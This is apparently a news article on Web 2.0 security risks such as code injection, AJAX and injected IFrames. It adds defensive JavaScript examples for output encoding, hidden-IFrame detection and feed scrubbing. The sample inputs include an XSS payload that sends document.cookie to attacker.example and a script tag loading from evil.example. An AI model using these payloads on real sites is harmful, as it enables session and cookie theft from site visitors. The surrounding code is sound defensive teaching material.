Paul Ferguson, a network architect with antivirus vendor Trend Micro, summed up Web 2.0 this way: “We’re basically training our online users to be exploited.”
He’s not the only security expert who feels this way. Researchers who live and breathe malware told InternetNews.com in multiple interviews that the very nature of Web 2.0 technology, and the way it is used, invites malicious software infection and is virtually impossible to secure.
The laundry list of complaints about Web 2.0 security can be boiled down to two distinct problems: not knowing all of your data sources, and having no control over what may be served up.
“Web 2.0 sites are defined by user collaboration and user input. So whenever you have input from a user that can show up on a Web page to other people, that creates a form of risk,” said Jon Orbeton, strategic product manager for IronPort, a developer of gateway filtering hardware.
Bob Buffone, chief architect with Nexaweb, a provider of Web 2.0-based applications for the enterprise, agrees. “From the end user’s perspective, this third party code inclusion – IFrame
End users can’t protect themselves, because from the Web page they are on they can’t see where all of this content is being pulled from. A well-programmed site checks data taken from an outside source before it’s sent down to the user, rejecting anything that isn’t the kind of content it expects. Programmers call that process input validation.
If something from the outside is brought into an application, it needs to be scrubbed for dangerous code. But all too often, data and code are simply grabbed from a variety of sources without the developer ever checking whether they contain anything malicious. Even a trusted site can no longer be trusted.
It’s the nature of the Web 2.0 beast to bring in data from other sources, which is what makes it fun and at the same time dangerous. “What makes it more dangerous is collaboration. There’s so much more data being exposed these days. With GeoCities a decade ago, it was pretty unscriptable. There wasn’t much the bad guys could do to harvest information and there was little people put out there,” said Randy Abrams, director of technical training for antivirus vendor ESET Software.
“GeoCities was like a bunch of apartments, whereas MySpace is like Times Square, except people are hanging up their dirty laundry and changing in public,” he added.
Fortunately, some of the Web 2.0 leaders are beginning to recognize this. When it launched a developer platform earlier this month, MySpace was quite careful to put in many of the security measures that security experts say are needed. This includes code scrubbing and means to prevent code injection.
One of the most common means of exploiting a Web 2.0 site is code injection. It’s highly preventable if developers validate all the input they get and ensure it is the type of content that should be allowed. But many developers don’t, because they don’t know they need to in the first place, argues Mary Landesman, senior security researcher for ScanSafe, a security service provider.
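As an added example, not code from the article or from any of the companies quoted in it, here is the code-injection problem in a small user-profile renderer of the kind a social site serves to other users: the unsafe version concatenates what the user saved straight into the page, and the hardened version validates what has a known shape and HTML-encodes everything else on output. The function names, the profile fields and the hostile profile are constructed for illustration.

```javascript
// Added example, not from the article. Function names, profile fields and the
// sample profile below are hypothetical, constructed for illustration.

// Encode the characters that let text break out of an HTML text node or a
// double-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// A link is accepted only as an absolute http(s) URL. This is what stops
// javascript: and data: URLs from turning a profile link into script.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : null;
  } catch {
    return null;
  }
}

// Positive validation: a display name is allowlisted to a small character set
// and a maximum length, rather than scanned for known-bad strings.
const DISPLAY_NAME = /^[\p{L}\p{N} _.'-]{1,40}$/u;
function validateDisplayName(name) {
  return typeof name === 'string' && DISPLAY_NAME.test(name) ? name : null;
}

// 1. Unsafe: whatever the user saved is concatenated into the page, so a
//    profile viewed by other users runs its author's script in their session.
function renderProfileUnsafe(profile) {
  return `<h1>${profile.name}</h1>` +
         `<p>${profile.about}</p>` +
         `<a href="${profile.homepage}">homepage</a>`;
}

// 2. Hardened: validate what has a known shape, encode everything on output,
//    and drop the link entirely rather than emit one that failed validation.
function renderProfileSafe(profile) {
  const name = validateDisplayName(profile.name);
  if (name === null) throw new Error('invalid display name');
  const href = safeHref(profile.homepage);
  const link = href === null
    ? ''
    : `<a href="${escapeHtml(href)}" rel="noopener noreferrer">homepage</a>`;
  return `<h1>${escapeHtml(name)}</h1>` +
         `<p>${escapeHtml(profile.about)}</p>` +
         link;
}

// Constructed sample: the kind of profile an attacker saves on a social site.
// "about" carries an event-handler injection, "homepage" a javascript: URL.
const HOSTILE_PROFILE = {
  name: 'bob',
  about: '<img src=x onerror="location=\'http://attacker.example/?c=\'+document.cookie">',
  homepage: 'javascript:alert(document.cookie)',
};

console.log(renderProfileUnsafe(HOSTILE_PROFILE));
console.log(renderProfileSafe(HOSTILE_PROFILE));
```

Two design points are worth noting. Encoding happens at the point of output, because that is where the data meets the HTML context; validating on the way in (the display name) is a second, independent check, not a substitute. And the link is dropped rather than "fixed", since rewriting a URL that failed validation only invites a bypass.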
“The boundaries between good site/bad site are dissolving due to cross site injection attacks,” she said. “People are not being infected because people go to bad sites, but more often that they visit a legit website and it has a code injection compromise, so the user is then subjected to content pulled from a malicious site.”
Will It Blend?
The problem then becomes securing this stuff, and that’s not easy. You can set up all the edge servers and firewalls you want, but they pass HTTP traffic on port 80, and once the browser lets in all that JavaScript code, you’ve just bypassed a lot of your security measures.
“AJAX is as safe as JavaScript and JavaScript itself is widely used to exploit the browsers,” said Yuval Ben-Itzhak, CTO of Finjan. “The risk in AJAX is after the page is loaded, it can access a remote server and download content to infect your machine. Traditional security will find it difficult to deal with AJAX requests as opposed to normal user requests.”
Even worse, Ben-Itzhak said, a piece of malicious code can be broken up and sent down in segments within the AJAX responses, bypassing signatures that look for the malware as a whole and not in parts.
The problem is that, like so many Internet technologies, everyone was in such a rush to do something cool that they thought about security later. No one would dream of hosting a Web site in this day and age the way they were operated in 1996. Twelve years from now, we may have the same hindsight about Web 2.0. Security experts are saying wake up right now.
“It’s not unusual for new technologies to come out with security as an afterthought,” said Kevin Haley, director of product management for Symantec Security Response. “So I don’t think this should be totally unexpected. Security is an afterthought as the technology emerges. If it’s going to be viable they have to start looking at closing these holes.”
That means thinking like a bad guy. “First off, these developers have got to start thinking beyond how can I build something cool to how can I be a really bad person,” said Abrams. “Most programmers think ‘how do I make something work?’ The fundamental thought needs to be ‘how can what I’m making be abused,’ and start putting security in place.”
A Pain In The IFrame
One of the most common vectors for exploits is the IFrame, which is essentially for the Web what picture-in-picture is for your TV: it allows content from another site to be displayed seamlessly inside a page. While convenient, it has also been a repeated source of attack, and no wonder.
You think you’re going to a harmless page on a trusted site, but an IFrame injected into that page points to a page with malicious code. Last summer, more than 10,000 sites were compromised and redirected visitors to sites with malicious code. Since most of the sites were in Italy, the attack was dubbed “The Italian Job,” in homage to the movie.
IFrame exploits are being reported almost weekly now. It’s left Dave Marcus, security research and communications manager for McAfee’s Avert Labs, reconsidering the value of IFrame. “Lately it seems to be more trouble than it’s worth,” he said. “I don’t think a lot of functionality would be lost if they significantly eliminated IFrames. They’re just more trouble than they are worth.”
In the case of The Italian Job, 10,000 sites were affected by a single PHP script, all through one site. More than 80,000 people were affected in one short period of time. “You gotta wonder if it’s worth it,” said Marcus.
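The Italian Job pattern, an invisible IFrame appended to otherwise legitimate pages, is something a site owner can look for in their own HTML. What follows is an added example, not the article’s or any vendor’s code: a scanner that walks a page’s markup and flags IFrames that are both hidden and point off-site. The sample page and the host names are constructed; it relies on Node’s built-in URL parser and tolerant regular expressions rather than a full HTML parser, so it is a first-pass check, not a guarantee, and it will not catch a frame that is written into the page by obfuscated script at load time.

```javascript
// Added example, not from the article or any vendor named in it. The sample
// page, the site host and the attacker host are constructed for illustration.

const IFRAME_TAG = /<iframe\b([^>]*)>/gi;
const ATTRIBUTE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

// Pull name="value" pairs out of a tag's attribute text (names lower-cased).
function parseAttributes(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTRIBUTE)) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4] ?? '').trim();
  }
  return attrs;
}

// Injected frames in these compromises are meant to be invisible: zero or
// one-pixel dimensions, or an inline style that hides the element.
function isHidden(attrs) {
  const w = parseInt(attrs.width ?? '', 10);
  const h = parseInt(attrs.height ?? '', 10);
  if ((!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1)) return true;
  const style = (attrs.style ?? '').toLowerCase().replace(/\s+/g, '');
  return /visibility:hidden|display:none|(^|;)(width|height):0(px)?(;|$)/.test(style);
}

// A src that resolves to a host outside the site or its subdomains. Relative
// URLs are resolved against the site, so "/menu.html" counts as on-site.
function isOffSite(src, siteHost) {
  let u;
  try { u = new URL(src, `http://${siteHost}/`); } catch { return false; }
  return u.hostname !== siteHost && !u.hostname.endsWith('.' + siteHost);
}

// Flag only frames that are both hidden and off-site: a visible off-site frame
// is an ordinary embed, and a hidden on-site one is usually the site's own plumbing.
function findSuspiciousIframes(html, siteHost) {
  const hits = [];
  for (const m of html.matchAll(IFRAME_TAG)) {
    const attrs = parseAttributes(m[1]);
    const src = attrs.src ?? '';
    if (isOffSite(src, siteHost) && isHidden(attrs)) {
      hits.push({ src, tag: m[0] });
    }
  }
  return hits;
}

// Constructed sample page: two legitimate frames and one injected after the
// closing tags, which is where a script that appends to every page leaves it.
const SITE_HOST = 'www.ristorante.example';
const SAMPLE_PAGE = `<html><body>
<h1>Ristorante Example</h1>
<iframe src="/menu.html" width="600" height="400"></iframe>
<iframe src="http://video-host.example/embed/abc" width="425" height="344"></iframe>
</body></html>
<iframe src="http://counter-host.example/stats.php" width="0" height="0" style="visibility: hidden"></iframe>`;

console.log(findSuspiciousIframes(SAMPLE_PAGE, SITE_HOST));
```

Run against a crawl of your own pages, the output is a short list of frames to inspect by hand; any hit that you did not put there is a sign the server, not just the page, has been compromised, and the PHP script that did the appending is the next thing to look for.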
However, Window Snyder (yes, that’s her name), chief security something or other (yes, that’s her title) for the Mozilla Foundation defends IFrame as valuable and securable. “We’re doing all the things we can to make it as secure as possible, but security is difficult,” she admitted. “It’s going to be work. Security in Firefox 3 is going to include IFrame protection. Is it 100 percent effective? No, but nothing in security is.”
Snyder said there is some burden on developers, who need to implement threat modeling, penetration testing, source code review, and have a response plan in place for vulnerabilities.
Snyder’s sentiments echo those of others: security can’t be an afterthought. “Just because a lot of features on the Internet were implemented without security doesn’t mean we shouldn’t use them. We should look for ways to do them securely. Every feature you develop, every control you write, you need to consider security. You can’t tack it on at the end,” she said.
Symantec’s Haley said that while nothing is 100 percent securable, he’s also not sure of the practicality of kicking IFrames from the browser. “It’s not so much IFrame, it’s the exploits that go through IFrame. IFrame may not be very secure in its current form but there are things that have got to be done to make it better, like not allowing things to be executed in IFrame.”
Shortening The Leash
So what’s the solution? The security pros say it’s time to rein in the nearly unrestrained freedom of a Web 2.0 environment, regardless of the foot-stomping that occurs. What’s also needed is a little more granularity in the options for IT managers.
“The challenge for a lot of organizations is only having that binary decision of allowing or blocking it doesn’t work,” said Frank Cabri, vice president of product management for Facetime, a security provider and compliance firm.
“Anyone can block MySpace, but we try to take that a little further, and let them go to MySpace but don’t allow use of its instant messenger,” he added. “So you educate them and sanction only a few widgets. Sometimes there’s an uprising with employees, they feel they have a right to do this in the office. IT doesn’t see it that way. It’s not a free-for-all because we gave you a PC.”
Developers need to be educated on security, said Landesman. “I think that a concerted effort to raise the savviness of Web developers, raise the number of experienced Web developers, and introduce certifications that give some indication of that level of experience,” she said.
Input validation is a must, said Ben-Itzhak. “Web sites need to look at what the content is doing. If it’s trying to change computer settings or access the local disk, it’s enough to say it’s suspicious,” he said. “Before they publish content, MySpace can just scan it with technologies that understand what it will do. It might take a minute but at least you can make sure this content is legitimate rather than let’s give people whatever they want.”
Jon Orbeton of IronPort is also in agreement on this technique. “Sites need to ensure they have good Web development and secure coding techniques. Input means scrubbing metacharacters by examining code as it comes in to see if it contains metacharacters to execute code on the user’s machine when they use it,” he said.
That’s already being done on some levels, said Buffone. “What a lot of people do now is instead of cross site scripting, they initiate the request, pull down the information, scrub the data, pare it down and send it to the app host. But it has to be done from the server, not from the client,” he said.
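The server-side approach Buffone describes, as an added example rather than Nexaweb’s or anyone else’s code: the server fetches the third-party feed itself, then scrubs and pares it down against an allowlist of sources, fields, types and lengths before anything is handed to the browser. The feed format, the allowed source hosts and the sample payload are constructed for illustration; the network fetch is left out so the block runs offline on the embedded payload.

```javascript
// Added example, not from the article. Feed format, source allowlist and the
// sample payload are hypothetical, constructed for illustration.

// Only data from sources the site has decided to trust is processed at all.
const ALLOWED_SOURCES = new Set(['feeds.partner.example', 'api.maps.example']);

// Only these fields survive, each with a type and a bound. Anything else the
// feed sends (tracking ids, HTML snippets, extra keys) never reaches the page.
const SCHEMA = {
  title:   { type: 'string', max: 120 },
  summary: { type: 'string', max: 500 },
  link:    { type: 'url' },
  lat:     { type: 'number', min: -90,  max: 90 },
  lon:     { type: 'number', min: -180, max: 180 },
};

function isAllowedSource(url) {
  try { return ALLOWED_SOURCES.has(new URL(url).hostname); } catch { return false; }
}

// Strings carrying markup or control characters are rejected outright: the page
// will still encode them on output, but markup in a data feed is a signal, not data.
function cleanString(value, max) {
  if (typeof value !== 'string') return null;
  if (/[<>\u0000-\u001f]/.test(value)) return null;
  return value.length <= max ? value : null;
}

// Returns the pared-down item, or null if any present field fails its rule.
function scrubItem(item) {
  const out = {};
  for (const [field, rule] of Object.entries(SCHEMA)) {
    const v = item[field];
    if (v === undefined) continue;            // missing field: simply absent
    let cleaned = null;
    if (rule.type === 'string') {
      cleaned = cleanString(v, rule.max);
    } else if (rule.type === 'number') {
      cleaned = typeof v === 'number' && v >= rule.min && v <= rule.max ? v : null;
    } else if (rule.type === 'url') {
      cleaned = typeof v === 'string' && /^https:\/\/[^\s"'<>]+$/.test(v) ? v : null;
    }
    if (cleaned === null) return null;        // one bad field rejects the item
    out[field] = cleaned;
  }
  return out;
}

// What the proxy returns to the app host: clean items plus a count of what it
// threw away, which is worth alerting on when it jumps for a trusted source.
function scrubFeed(sourceUrl, payload) {
  if (!isAllowedSource(sourceUrl)) throw new Error('unknown data source: ' + sourceUrl);
  if (!Array.isArray(payload.items)) return { items: [], rejected: 0 };
  const items = [];
  let rejected = 0;
  for (const raw of payload.items) {
    const item = scrubItem(raw);
    if (item === null) rejected += 1; else items.push(item);
  }
  return { items, rejected };
}

// Constructed sample payload: one good item, then a script in a title, a
// javascript: link, and an out-of-range coordinate.
const SAMPLE_FEED = {
  items: [
    { title: 'Cafe Roma', summary: 'Espresso bar', link: 'https://feeds.partner.example/p/1',
      lat: 41.9, lon: 12.5, internalId: 'tracker-7' },
    { title: 'Trattoria <script src=//evil.example/a.js></script>',
      link: 'https://feeds.partner.example/p/2', lat: 45, lon: 9 },
    { title: 'Pizzeria', link: 'javascript:alert(1)', lat: 41, lon: 12 },
    { title: 'Bad coords', lat: 9999, lon: 0 },
  ],
};

console.log(scrubFeed('https://feeds.partner.example/places', SAMPLE_FEED));
```

The point of doing this on the server is that the browser never sees the raw feed, so a compromised or merely sloppy data source can at worst starve the page of items, not inject into it; the rejected count also gives the operator an early signal that a partner feed has started sending things it never used to.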
There also needs to be a reevaluation of widgets being used in applications, even when they are from a trusted source like Google, because those too can be compromised. “I wouldn’t even trust Google Maps with sensitive financial data,” he said. “It depends on the setting. Combined with Flickr pictures? What could someone do with that? But mashing up Google Maps with proprietary or commercial information, like your revenue? I wouldn’t put Google Maps on that page.”